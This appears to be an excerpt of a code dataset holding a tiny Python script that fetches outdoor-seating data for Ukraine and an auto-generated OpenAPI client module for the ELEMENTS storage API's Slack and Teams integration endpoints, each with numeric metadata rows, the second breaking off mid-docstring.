9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | null | null | null |
from download_data import get_outdoor_seatings_for_country
country_name = 'Ukraine'
get_outdoor_seatings_for_country(country_name)
| 26.4
| 58
| 0.893939
| 19
| 132
| 5.631579
| 0.578947
| 0.186916
| 0.336449
| 0.392523
| 0.728972
| 0.728972
| 0.728972
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 132
| 4
| 59
| 33
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b7ff724437975fc6a6a9b411e6de2d9975413a2d
| 115,183
|
py
|
Python
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | 6
|
2020-11-16T23:15:18.000Z
|
2022-03-14T03:56:12.000Z
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | 1
|
2021-07-28T13:03:49.000Z
|
2021-08-25T12:24:01.000Z
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
ELEMENTS API
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from elements_sdk.api_client import ApiClient
from elements_sdk.exceptions import (
ApiTypeError,
ApiValueError
)
class IntegrationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_slack_connection(self, id, **kwargs): # noqa: E501
"""delete_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_slack_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_slack_connection_with_http_info(id, **kwargs) # noqa: E501
def delete_slack_connection_with_http_info(self, id, **kwargs): # noqa: E501
"""delete_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_slack_connection_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_slack_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_slack_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_teams_connection(self, id, **kwargs): # noqa: E501
"""delete_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_teams_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_teams_connection_with_http_info(id, **kwargs) # noqa: E501
def delete_teams_connection_with_http_info(self, id, **kwargs): # noqa: E501
"""delete_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_teams_connection_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_teams_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_teams_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_slack_connections(self, **kwargs): # noqa: E501
"""get_all_slack_connections # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_slack_connections(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[SlackConnection]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_slack_connections_with_http_info(**kwargs) # noqa: E501
def get_all_slack_connections_with_http_info(self, **kwargs): # noqa: E501
"""get_all_slack_connections # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_slack_connections_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[SlackConnection], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ordering', 'limit', 'offset'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_slack_connections" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SlackConnection]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_teams_connections(self, **kwargs): # noqa: E501
"""get_all_teams_connections # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_teams_connections(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TeamsConnection]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_all_teams_connections_with_http_info(**kwargs) # noqa: E501
def get_all_teams_connections_with_http_info(self, **kwargs): # noqa: E501
"""get_all_teams_connections # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_teams_connections_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str ordering: Which field to use when ordering the results.
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TeamsConnection], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ordering', 'limit', 'offset'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_teams_connections" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamsConnection]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_slack_channels(self, id, **kwargs): # noqa: E501
"""get_slack_channels # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_channels(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[SlackChannel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_slack_channels_with_http_info(id, **kwargs) # noqa: E501
def get_slack_channels_with_http_info(self, id, **kwargs): # noqa: E501
"""get_slack_channels # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_channels_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[SlackChannel], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_slack_channels" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_slack_channels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}/channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SlackChannel]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_slack_connection(self, id, **kwargs): # noqa: E501
"""get_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SlackConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_slack_connection_with_http_info(id, **kwargs) # noqa: E501
def get_slack_connection_with_http_info(self, id, **kwargs): # noqa: E501
"""get_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_connection_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_slack_connection" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_slack_connection`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SlackConnection', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_slack_emoji(self, id, **kwargs): # noqa: E501
"""get_slack_emoji # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_emoji(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[SlackEmoji]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_slack_emoji_with_http_info(id, **kwargs) # noqa: E501
def get_slack_emoji_with_http_info(self, id, **kwargs): # noqa: E501
"""get_slack_emoji # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_emoji_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[SlackEmoji], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_slack_emoji" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_slack_emoji`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}/emoji', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SlackEmoji]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_slack_users(self, id, **kwargs): # noqa: E501
"""get_slack_users # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_users(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[SlackUser]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_slack_users_with_http_info(id, **kwargs) # noqa: E501
def get_slack_users_with_http_info(self, id, **kwargs): # noqa: E501
"""get_slack_users # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_slack_users_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[SlackUser], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_slack_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_slack_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/slack/{id}/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SlackUser]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_teams_channels(self, id, **kwargs): # noqa: E501
"""get_teams_channels # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_channels(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TeamsRecipient]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_teams_channels_with_http_info(id, **kwargs) # noqa: E501
def get_teams_channels_with_http_info(self, id, **kwargs): # noqa: E501
"""get_teams_channels # noqa: E501
### Required permissions * User account permission: `tasks:manage` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_channels_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TeamsRecipient], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_teams_channels" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_teams_channels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/2/integrations/teams/{id}/channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TeamsRecipient]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_teams_connection(self, id, **kwargs): # noqa: E501
"""get_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_teams_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TeamsConnection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_teams_connection_with_http_info(id, **kwargs) # noqa: E501
def get_teams_connection_with_http_info(self, id, **kwargs): # noqa: E501
"""get_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
